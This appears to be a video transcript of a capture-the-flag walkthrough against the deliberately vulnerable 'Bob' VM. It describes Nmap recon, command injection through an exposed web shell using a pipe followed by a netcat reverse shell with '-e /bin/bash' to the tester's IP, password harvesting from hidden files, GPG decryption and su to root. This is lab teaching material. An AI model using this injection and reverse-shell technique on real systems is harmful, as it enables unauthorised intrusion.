This video is for demo and educational purposes only. Today we're doing CTF, capture the flag exercise on VM Bob 1.0.1, from vulhub.com. The goal is to get the flag in root directory. Hints: remember to look for hidden info and files. Let's get started. Let's check our target IP by typing netdiscover-i eth0. And just to make sure, I'll be using ping command. And now, let's scan our target using Nmap tool. Take note. Feel free to use your preferred switches to scan our target. I'm not gonna explain my switches in this video. As we can see, our target VM have port 80 open. Open web browser and type your target IP into the address bar. I'll pick login.php first, your choice. OK, dev_shell.php second. As we can see, a target machine have web shell enabled. Let's check the rest. So it says there is a web shell running in the server and it's unprotected. And that's what we've seen after navigating to dev_shell.php. Now that we've seen all we gathered from our target using Nmap tool, let's try what we've got in web shell. From here, let me try this. I suppose normal netcat command wouldn't work in here. Let me see my IP address first. Let's establish a listener on port 4441, and let's try to put a normal netcat command in web shell. Let's try this. As we can see, uname-a is a valid command. Who am I, also a valid command. sudo-l, also a valid command. And also clear command is valid. As I said before, let's try a normal netcat command in web shell and see what will happen. And this is my Kali IP, 192.168.2.9. So our listener is good to go. Let's start NC into the web shell. And as expected, it'll fail to connect. But how about we add some pipe after the valid characters, then after that we add netcat after the pipe. Like this. Valid characters, space, pipe, space NC host IP, port number, -e/bin/bash. And now click submit. And there we have it. It works. For now we have non-interactive shell, but let's make it interactive. Okay, let's proceed. Remember, look for hidden info and files. Take note. We can use LSLA to show all hidden files out there. So those are the files we've gathered before after using Nmap tool. From here, we spotted a flag.txt. For sure we can't capture it right now because we need to access the root directory first. After that we can now capture the flag. From here I'll change directory to Elliot first. Then type ls-a. Next, type cat, the admin is dumb.txt. From here, you can pause the video if you want to read all the text in there. Your choice. Now we know Elliot password is. So from here, I'll switch user to Elliot. Type su then enter his password. Again, capturing flag.txt is also denied as well. We don't have root privilege yet. Change directory to Bob, then type ls-a, or you can type ls-la. Notice, there's a hidden file in here that we can capture. Next, type cat.old_password_file.html. After that, let's save user JC and Seb's password into text editor like Mousepad, Vims, or etc. As we can see, I've got user Elliot, JC, and Seb and their password. Next is finding Bob's password. Change directory to Bob's documents and type ls-la. Inside Bob's documents, there's a file named login.txt.gpg, a symmetrically encrypted data. We can search that to the internet. Just open up web browser, then search about GPG symmetrically encrypted data, and how to decrypt. Or we can search it into our Kali Linux machine, open a terminal and type gpg-help. Now, at Bob's documents, change directory to secret, keep_out, filtered, no_lookie, _in, _here. Some folder or file are not executable out there. In the last folder at Bob's documents, there's a file in there. Type ls-la, then cat, notes.sh. Highlights all the text as shown in the video, then copy and save to any text editor you prefer. Mine is Mousepad. From here, let's head back to Bob's Documents main folder to decrypt login.txt.jpg. Moving on from connection problem, but still you can see it yourself about GPG symmetrically encrypted data on the internet or typing gpg-help in Kali's terminal. Next, we're going to decrypt the file. Type gpg space --batch space --passphrase. And let's take a look and sort our password from what we've copied earlier in notes.sh. Harpocrates. This is the password we need to decrypt login.txt.jpg. Let's copy this and proceed decrypting the file. Small letter D for decrypt. And last is name of the file. And there we have it. Bob's password. With this we can now switch user Bob. Now let's get back where the flag.txt and try to capture the flag. Notice, it give us meow flag.txt. How about we type su for super user then Bob's password. And that's it. Now we have root privilege. The key of getting root is by typing su stands for super user, then Bob's password. Now let's capture our flag. Typecat flag.txt. Recap. First, we find our target IP using NetDiscover. Second, we used Nmap to scan our target for vulnerability. Third, we establish Netcat in our Kali Linux machine. Fourth, we interact and submit our exploit in Web Shell. Fifth, we make non-interactive shell to interactive. 6. I started with Elliot then found his password, after that we log in to Elliot machine. 7. We found JC and Seb's password. 8. We decrypt a file and got Bob's password. 9th, we type su and Bob's password. 10th, we've got root privileges and we capture the flag.txt. So the remaining time in this video is about logging Elliot, JC, Seb, and Bob's creds into virtual machine. Feel free to skip the video. Stay safe and cheers. And also thanks to the author, CorruptedBit for making this awesome VM.